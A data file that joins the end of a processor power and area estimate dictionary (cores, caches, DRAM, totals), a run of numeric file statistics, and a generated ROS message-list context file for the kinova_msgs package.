'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000516772,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00154465,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00278975,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0345829,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.19977,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.080069,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.117459,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.52505,
'Instruction Fetch Unit/Runtime Dynamic': 0.236446,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0463941,
'L2/Runtime Dynamic': 0.00401459,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.59537,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.657263,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0439427,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0439426,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.80288,
'Load Store Unit/Runtime Dynamic': 0.917916,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.108355,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.21671,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0384556,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0391504,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.136774,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0131318,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.358943,
'Memory Management Unit/Runtime Dynamic': 0.0522822,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.7961,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.13251,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00684483,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0569405,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.196296,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.80552,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0981967,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.279817,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.622045,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.18956,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.305753,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.154334,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.649647,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.121434,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.10391,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.117518,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.007951,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0905286,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0588025,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.208046,
'Execution Unit/Register Files/Runtime Dynamic': 0.0667535,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.215273,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.562655,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.96425,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 2.12932e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 2.12932e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 1.857e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 7.20164e-06,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000844703,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000905859,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000203314,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0565284,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.59569,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.13911,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.191996,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.98871,
'Instruction Fetch Unit/Runtime Dynamic': 0.388743,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0399561,
'L2/Runtime Dynamic': 0.0110362,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.62214,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.15876,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0771611,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0771611,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.98651,
'Load Store Unit/Runtime Dynamic': 1.61645,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.190266,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.380532,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0675261,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.06811,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.223567,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0228527,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.495673,
'Memory Management Unit/Runtime Dynamic': 0.0909628,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.2042,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.309136,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0123145,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0907896,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.41224,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.48368,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 3.8126648077879777,
'Runtime Dynamic': 3.8126648077879777,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.203129,
'Runtime Dynamic': 0.0598429,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 82.0728,
'Peak Power': 115.185,
'Runtime Dynamic': 22.4326,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 81.8697,
'Total Cores/Runtime Dynamic': 22.3728,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.203129,
'Total L3s/Runtime Dynamic': 0.0598429,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.083151
| 124
| 0.682045
| 8,090
| 68,626
| 5.779728
| 0.067985
| 0.12353
| 0.112922
| 0.093417
| 0.938171
| 0.929574
| 0.91749
| 0.884961
| 0.860323
| 0.842316
| 0
| 0.131924
| 0.224274
| 68,626
| 914
| 125
| 75.083151
| 0.746407
| 0
| 0
| 0.642232
| 0
| 0
| 0.657249
| 0.048086
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
42c23e1d62ace450801f32c424bf3c5b9e10adee
| 5,061
|
py
|
Python
|
build/kinova-ros/kinova_msgs/cmake/kinova_msgs-genmsg-context.py
|
madalynlmillen/MadalynMillenCapstone
|
a1585ba419d4ab4854908b4ba88e4c8ca330b5cd
|
[
"MIT",
"Unlicense"
] | null | null | null |
build/kinova-ros/kinova_msgs/cmake/kinova_msgs-genmsg-context.py
|
madalynlmillen/MadalynMillenCapstone
|
a1585ba419d4ab4854908b4ba88e4c8ca330b5cd
|
[
"MIT",
"Unlicense"
] | null | null | null |
build/kinova-ros/kinova_msgs/cmake/kinova_msgs-genmsg-context.py
|
madalynlmillen/MadalynMillenCapstone
|
a1585ba419d4ab4854908b4ba88e4c8ca330b5cd
|
[
"MIT",
"Unlicense"
] | null | null | null |
# generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = "/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/msg/FingerPosition.msg;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/msg/JointAngles.msg;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/msg/JointVelocity.msg;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/msg/JointTorque.msg;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/msg/KinovaPose.msg;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/msg/PoseVelocity.msg;/home/kinova/MillenCapstone/catkin_ws/src/kinova-ros/kinova_msgs/msg/CartesianForce.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmJointAnglesAction.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmJointAnglesActionGoal.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmJointAnglesActionResult.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmJointAnglesActionFeedback.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmJointAnglesGoal.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmJointAnglesResult.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmJointAnglesFeedback.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmPoseAction.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmPoseActionGoal.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmPoseActionResult.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmPoseActionFeedback.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmPoseGoal.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmPoseResult.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/ArmPoseFeedback.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/Arm_KinovaPoseAction.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/Arm_KinovaPoseActionGoal.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/Arm_KinovaPoseActionResult.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/Arm_KinovaPoseActionFeedback.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/Arm_KinovaPoseGoal.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/Arm_KinovaPoseResult.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/Arm_KinovaPoseFeedback.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/SetFingersPositionAction.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/SetFingersPositionActionGoal.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/SetFingersPositionActionResult.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/SetFingersPositionActionFeedback.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/SetFingersPositionGoal.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/SetFingersPositionResult.msg;/home/kinova/MillenCapstone/catkin_ws/devel/share/kinova_msgs/msg/SetFingersPositionFeedback.msg"
